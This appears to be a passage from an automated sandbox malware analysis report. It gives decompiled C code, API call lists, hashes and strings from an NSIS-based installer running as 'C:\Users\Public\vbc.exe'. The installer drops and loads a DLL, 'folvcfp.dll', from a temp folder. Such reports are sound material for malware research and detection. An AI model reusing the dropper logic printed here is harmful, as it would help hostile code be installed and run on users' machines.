                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                          • API String ID: 4283519449-3503189988
                                          • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                          • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                          • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                          • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E00401734(FILETIME* __ebx, void* __eflags) {
                                          				void* _t33;
                                          				void* _t41;
                                          				void* _t43;
                                          				FILETIME* _t49;
                                          				FILETIME* _t62;
                                          				void* _t64;
                                          				signed int _t70;
                                          				FILETIME* _t71;
                                          				FILETIME* _t75;
                                          				signed int _t77;
                                          				void* _t80;
                                          				CHAR* _t82;
                                          				void* _t85;
                                          
                                          				_t75 = __ebx;
                                          				_t82 = E004029E8(0x31);
                                          				 *(_t85 - 8) = _t82;
                                          				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                          				_t33 = E0040548B(_t82);
                                          				_push(_t82);
                                          				if(_t33 == 0) {
                                          					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                                          				} else {
                                          					_push(0x409b78);
                                          					E0040592B();
                                          				}
                                          				E00405B89(0x409b78);
                                          				while(1) {
                                          					__eflags =  *(_t85 + 8) - 3;
                                          					if( *(_t85 + 8) >= 3) {
                                          						_t64 = E00405C22(0x409b78);
                                          						_t77 = 0;
                                          						__eflags = _t64 - _t75;
                                          						if(_t64 != _t75) {
                                          							_t71 = _t64 + 0x14;
                                          							__eflags = _t71;
                                          							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                          						}
                                          						asm("sbb eax, eax");
                                          						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                          						__eflags = _t70;
                                          						 *(_t85 + 8) = _t70;
                                          					}
                                          					__eflags =  *(_t85 + 8) - _t75;
                                          					if( *(_t85 + 8) == _t75) {
                                          						E004055E3(0x409b78);
                                          					}
                                          					__eflags =  *(_t85 + 8) - 1;
                                          					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                          					__eflags = _t41 - 0xffffffff;
                                          					 *(_t85 - 0x34) = _t41;
                                          					if(_t41 != 0xffffffff) {
                                          						break;
                                          					}
                                          					__eflags =  *(_t85 + 8) - _t75;
                                          					if( *(_t85 + 8) != _t75) {
                                          						E00404CC9(0xffffffe2,  *(_t85 - 8));
                                          						__eflags =  *(_t85 + 8) - 2;
                                          						if(__eflags == 0) {
                                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                                          						}
                                          						L31:
                                          						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                                          						__eflags =  *0x42ebe8;
                                          						goto L32;
                                          					} else {
                                          						E0040592B(0x40a378, 0x42f000);
                                          						E0040592B(0x42f000, 0x409b78);
                                          						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                          						E0040592B(0x42f000, 0x40a378);
                                          						_t62 = E004051EC("C:\Users\Albus\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll",  *(_t85 - 0x24) >> 3) - 4;
                                          						__eflags = _t62;
                                          						if(_t62 == 0) {
                                          							continue;
                                          						} else {
                                          							__eflags = _t62 == 1;
                                          							if(_t62 == 1) {
                                          								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                                          								L32:
                                          								_t49 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_push(0x409b78);
                                          								_push(0xfffffffa);
                                          								E00404CC9();
                                          								L29:
                                          								_t49 = 0x7fffffff;
                                          							}
                                          						}
                                          					}
                                          					L33:
                                          					return _t49;
                                          				}
                                          				E00404CC9(0xffffffea,  *(_t85 - 8));
                                          				 *0x42ec14 =  *0x42ec14 + 1;
                                          				_push(_t75);
                                          				_push(_t75);
                                          				_push( *(_t85 - 0x34));
                                          				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                          				_t43 = E00402E44(); // executed
                                          				 *0x42ec14 =  *0x42ec14 - 1;
                                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                          				_t80 = _t43;
                                          				if( *(_t85 - 0x18) != 0xffffffff) {
                                          					L22:
                                          					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                          				} else {
                                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                          						goto L22;
                                          					}
                                          				}
                                          				CloseHandle( *(_t85 - 0x34)); // executed
                                          				__eflags = _t80 - _t75;
                                          				if(_t80 >= _t75) {
                                          					goto L31;
                                          				} else {
                                          					__eflags = _t80 - 0xfffffffe;
                                          					if(_t80 != 0xfffffffe) {
                                          						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                                          					} else {
                                          						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                                          						lstrcatA(0x409b78,  *(_t85 - 8));
                                          					}
                                          					_push(0x200010);
                                          					_push(0x409b78);
                                          					E004051EC();
                                          					goto L29;
                                          				}
                                          				goto L33;
                                          			}
















                                          0x0040189f
                                          0x004018a5
                                          0x004018a7
                                          0x00000000
                                          0x004018ad
                                          0x004018ad
                                          0x004018b0
                                          0x004018c8
                                          0x004018b2
                                          0x004018b5
                                          0x004018be
                                          0x004018be
                                          0x004018cd
                                          0x004018d2
                                          0x004021fb
                                          0x00000000
                                          0x004021fb
                                          0x00000000

                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,hnahgvbse,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                          • CompareFileTime.KERNEL32(-00000014,?,hnahgvbse,hnahgvbse,00000000,00000000,hnahgvbse,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                            • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,psfiki Setup,NSIS Error), ref: 00405938
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                            • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                            • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nssE7A3.tmp$C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll$hnahgvbse
                                          • API String ID: 1941528284-1248813526
                                          • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                          • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                          • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                          • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                          				signed int _v8;
                                          				long _v12;
                                          				void* _v16;
                                          				long _v20;
                                          				long _v24;
                                          				intOrPtr _v28;
                                          				char _v92;
                                          				void* _t67;
                                          				void* _t68;
                                          				long _t74;
                                          				intOrPtr _t79;
                                          				long _t80;
                                          				void* _t82;
                                          				int _t84;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				void* _t100;
                                          				long _t101;
                                          				signed int _t102;
                                          				long _t103;
                                          				int _t104;
                                          				intOrPtr _t105;
                                          				long _t106;
                                          				void* _t107;
                                          
                                          				_t102 = _a16;
                                          				_t97 = _a12;
                                          				_v12 = _t102;
                                          				if(_t97 == 0) {
                                          					_v12 = 0x8000;
                                          				}
                                          				_v8 = _v8 & 0x00000000;
                                          				_v16 = _t97;
                                          				if(_t97 == 0) {
                                          					_v16 = 0x418b80;
                                          				}
                                          				_t65 = _a4;
                                          				if(_a4 >= 0) {
                                          					_t95 =  *0x42ebb8; // 0x32ba3
                                          					E00403098(_t95 + _t65);
                                          				}
                                          				_t67 = E00403066( &_a16, 4); // executed
                                          				if(_t67 == 0) {
                                          					L34:
                                          					_push(0xfffffffd);
                                          					goto L35;
                                          				} else {
                                          					if((_a19 & 0x00000080) == 0) {
                                          						if(_t97 == 0) {
                                          							while(_a16 > 0) {
                                          								_t103 = _v12;
                                          								if(_a16 < _t103) {
                                          									_t103 = _a16;
                                          								}
                                          								if(E00403066(0x414b80, _t103) == 0) {
                                          									goto L34;
                                          								} else {
                                          									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                          										L29:
                                          										_push(0xfffffffe);
                                          										L35:
                                          										_pop(_t68);
                                          										return _t68;
                                          									} else {
                                          										_v8 = _v8 + _t103;
                                          										_a16 = _a16 - _t103;
                                          										continue;
                                          									}
                                          								}
                                          							}
                                          							L45:
                                          							return _v8;
                                          						}
                                          						if(_a16 < _t102) {
                                          							_t102 = _a16;
                                          						}
                                          						if(E00403066(_t97, _t102) != 0) {
                                          							_v8 = _t102;
                                          							goto L45;
                                          						} else {
                                          							goto L34;
                                          						}
                                          					}
                                          					_t74 = GetTickCount();
                                          					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                                          					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                                          					_t14 =  &_a16;
                                          					 *_t14 = _a16 & 0x7fffffff;
                                          					_v20 = _t74;
                                          					 *0x40afc8 = 8;
                                          					 *0x414b70 = 0x40cb68;
                                          					 *0x414b6c = 0x40cb68;
                                          					 *0x414b68 = 0x414b68;
                                          					_a4 = _a16;
                                          					if( *_t14 <= 0) {
                                          						goto L45;
                                          					} else {
                                          						goto L9;
                                          					}
                                          					while(1) {
                                          						L9:
                                          						_t104 = 0x4000;
                                          						if(_a16 < 0x4000) {
                                          							_t104 = _a16;
                                          						}
                                          						if(E00403066(0x414b80, _t104) == 0) {
                                          							goto L34;
                                          						}
                                          						_a16 = _a16 - _t104;
                                          						 *0x40afb8 = 0x414b80;
                                          						 *0x40afbc = _t104;
                                          						while(1) {
                                          							_t100 = _v16;
                                          							 *0x40afc0 = _t100;
                                          							 *0x40afc4 = _v12;
                                          							_t79 = E00405D23(0x40afb8);
                                          							_v28 = _t79;
                                          							if(_t79 < 0) {
                                          								break;
                                          							}
                                          							_t105 =  *0x40afc0; // 0x41fa6b
                                          							_t106 = _t105 - _t100;
                                          							_t80 = GetTickCount();
                                          							_t101 = _t80;
                                          							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                          								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                          								_t107 = _t107 + 0xc;
                                          								E00404CC9(0,  &_v92);
                                          								_v20 = _t101;
                                          							}
                                          							if(_t106 == 0) {
                                          								if(_a16 > 0) {
                                          									goto L9;
                                          								}
                                          								goto L45;
                                          							} else {
                                          								if(_a12 != 0) {
                                          									_t82 =  *0x40afc0; // 0x41fa6b
                                          									_v8 = _v8 + _t106;
                                          									_v12 = _v12 - _t106;
                                          									_v16 = _t82;
                                          									L24:
                                          									if(_v28 != 1) {
                                          										continue;
                                          									}
                                          									goto L45;
                                          								}
                                          								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                          								if(_t84 == 0 || _v24 != _t106) {
                                          									goto L29;
                                          								} else {
                                          									_v8 = _v8 + _t106;
                                          									goto L24;
                                          								}
                                          							}
                                          						}
                                          						_push(0xfffffffc);
                                          						goto L35;
                                          					}
                                          					goto L34;
                                          				}
                                          			}


                                          APIs
                                          • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EAB
                                          • GetTickCount.KERNEL32(0040AFB8,00414B80,00004000), ref: 00402F52
                                          • MulDiv.KERNEL32 ref: 00402F7B
                                          • wsprintfA.USER32 ref: 00402F8B
                                          • WriteFile.KERNEL32(00000000,00000000,0041FA6B,7FFFFFFF,00000000), ref: 00402FB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CountTick$FileWritewsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 4209647438-2449383134
                                          • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                          • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                          • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                          • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 57%
                                          			E00401F51(void* __ebx, void* __eflags) {
                                          				struct HINSTANCE__* _t18;
                                          				struct HINSTANCE__* _t25;
                                          				void* _t26;
                                          				struct HINSTANCE__* _t29;
                                          				CHAR* _t31;
                                          				intOrPtr* _t32;
                                          				void* _t33;
                                          
                                          				_t26 = __ebx;
                                          				asm("sbb eax, 0x42ec18");
                                          				 *(_t33 - 4) = 1;
                                          				if(__eflags < 0) {
                                          					_push(0xffffffe7);
                                          					L14:
                                          					E00401423();
                                          					L15:
                                          					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                                          					return 0;
                                          				}
                                          				_t31 = E004029E8(0xfffffff0);
                                          				 *(_t33 + 8) = E004029E8(1);
                                          				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                          					L3:
                                          					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                          					_t29 = _t18;
                                          					if(_t29 == _t26) {
                                          						_push(0xfffffff6);
                                          						goto L14;
                                          					}
                                          					L4:
                                          					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                          					if(_t32 == _t26) {
                                          						E00404CC9(0xfffffff7,  *(_t33 + 8));
                                          					} else {
                                          						 *(_t33 - 4) = _t26;
                                          						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                          							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                                          						} else {
                                          							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                          							if( *_t32() != 0) {
                                          								 *(_t33 - 4) = 1;
                                          							}
                                          						}
                                          					}
                                          					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                          						FreeLibrary(_t29);
                                          					}
                                          					goto L15;
                                          				}
                                          				_t25 = GetModuleHandleA(_t31); // executed
                                          				_t29 = _t25;
                                          				if(_t29 != __ebx) {
                                          					goto L4;
                                          				}
                                          				goto L3;
                                          			}


                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                            • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                            • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                            • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                            • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
                                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID: B
                                          • API String ID: 2987980305-3806887055
                                          • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                          • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                          • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                          • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                          				struct _SECURITY_ATTRIBUTES** _t10;
                                          				int _t19;
                                          				struct _SECURITY_ATTRIBUTES* _t20;
                                          				signed char _t22;
                                          				struct _SECURITY_ATTRIBUTES* _t23;
                                          				CHAR* _t25;
                                          				struct _SECURITY_ATTRIBUTES** _t29;
                                          				void* _t30;
                                          
                                          				_t23 = __ebx;
                                          				_t25 = E004029E8(0xfffffff0);
                                          				_t10 = E004054B2(_t25);
                                          				_t27 = _t10;
                                          				if(_t10 != __ebx) {
                                          					do {
                                          						_t29 = E00405449(_t27, 0x5c);
                                          						 *_t29 = _t23;
                                          						 *((char*)(_t30 + 0xb)) =  *_t29;
                                          						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                          						if(_t19 == 0) {
                                          							if(GetLastError() != 0xb7) {
                                          								L4:
                                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                          							} else {
                                          								_t22 = GetFileAttributesA(_t25); // executed
                                          								if((_t22 & 0x00000010) == 0) {
                                          									goto L4;
                                          								}
                                          							}
                                          						}
                                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                          						 *_t29 = _t20;
                                          						_t27 =  &(_t29[0]);
                                          					} while (_t20 != _t23);
                                          				}
                                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                          					_push(0xfffffff5);
                                          					E00401423();
                                          				} else {
                                          					E00401423(0xffffffe6);
                                          					E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
                                          					SetCurrentDirectoryA(_t25); // executed
                                          				}
                                          				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                          				return 0;
                                          			}












                                          APIs
                                            • Part of subcall function 004054B2: CharNextA.USER32(dR@), ref: 004054C0
                                            • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                            • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                          • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                          • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                          • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 3751793516-2935972921
                                          • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                          • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                          • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                          • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                                          				signed int _t11;
                                          				int _t14;
                                          				signed int _t16;
                                          				void* _t19;
                                          				CHAR* _t20;
                                          
                                          				_t20 = _a4;
                                          				_t19 = 0x64;
                                          				while(1) {
                                          					_t19 = _t19 - 1;
                                          					_a4 = 0x61736e;
                                          					_t11 = GetTickCount();
                                          					_t16 = 0x1a;
                                          					_a6 = _a6 + _t11 % _t16;
                                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                          					if(_t14 != 0) {
                                          						break;
                                          					}
                                          					if(_t19 != 0) {
                                          						continue;
                                          					}
                                          					 *_t20 =  *_t20 & 0x00000000;
                                          					return _t14;
                                          				}
                                          				return _t20;
                                          			}









                                          APIs
                                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030E1,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405644
                                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040565E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-1498418707
                                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                          • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                          • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E004030AF(void* __eflags) {
                                          				void* _t2;
                                          				void* _t5;
                                          				CHAR* _t6;
                                          
                                          				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                          				E00405B89(_t6);
                                          				_t2 = E0040548B(_t6);
                                          				if(_t2 != 0) {
                                          					E0040541E(_t6);
                                          					CreateDirectoryA(_t6, 0); // executed
                                          					_t5 = E00405631("1033", _t6); // executed
                                          					return _t5;
                                          				} else {
                                          					return _t2;
                                          				}
                                          			}







                                          APIs
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BE1
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BEE
                                            • Part of subcall function 00405B89: CharNextA.USER32(?), ref: 00405BF3
                                            • Part of subcall function 00405B89: CharPrevA.USER32(?,?), ref: 00405C03
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 4115351271-1176120985
